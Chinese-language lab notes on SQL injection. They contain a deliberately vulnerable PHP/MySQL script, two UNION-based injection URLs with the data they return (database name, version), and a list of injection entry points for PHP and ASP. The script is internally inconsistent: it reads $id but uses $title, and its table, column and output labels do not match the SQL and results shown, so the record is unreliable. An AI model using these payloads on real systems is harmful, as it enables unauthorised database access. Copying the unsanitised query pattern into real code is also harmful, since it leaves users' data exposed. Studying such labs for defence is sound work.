类型SQL注入实验 Part1

准备为PHPstudy环境

<?php

$id = $_GET['t'];
$conn = mysql_connect("127.0.0.1","root","root");
mysql_select_db("kimmy",$conn);
$sql="select * from admin where use=$title";

$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
echo "UserId".$row['id']."<br >";
echo "Title".$row['title']."<br >";
echo "TextContent".$row['text']."<br >";
}

mysql_close($conn);

echo "The SQL Sentence:".$sql;

?>

　　

数字型

字符型：
PHP脚本

URL：
http://192.168.221.188/sqltest/index.php?t=admin' union select 1,2,3 and '1'='1

输出：
UserId:1
Username:admin
Password:password
UserId:1
Username:2
Password:1
The SQL Sentence:select * from info where username='admin' union select 1,2,3 and '1'='1'

URL：
http://192.168.221.188/sqltest/index.php?t=admin' union select database(),version(),3 and '1'='1

输出：
UserId:1
Username:admin
Password:password
UserId:kimmy
Username:5.5.53
Password:1
The SQL Sentence:select * from info where username='admin' union select database(),version(),3 and '1'='1'

搜索型：
%通配符

提交注入

GET注入

Post注入

Cookie注入

http头注入

基础；http数据包

PHP：

$_GET 接受get传递

$_POST接受post传递

$_COOKIE接受cookie传递

$_REQUEST 全部接受

Asp:

Request.querystring  接受get

Request.form接受post

Request.cookie 接受cookie

Request 全部接受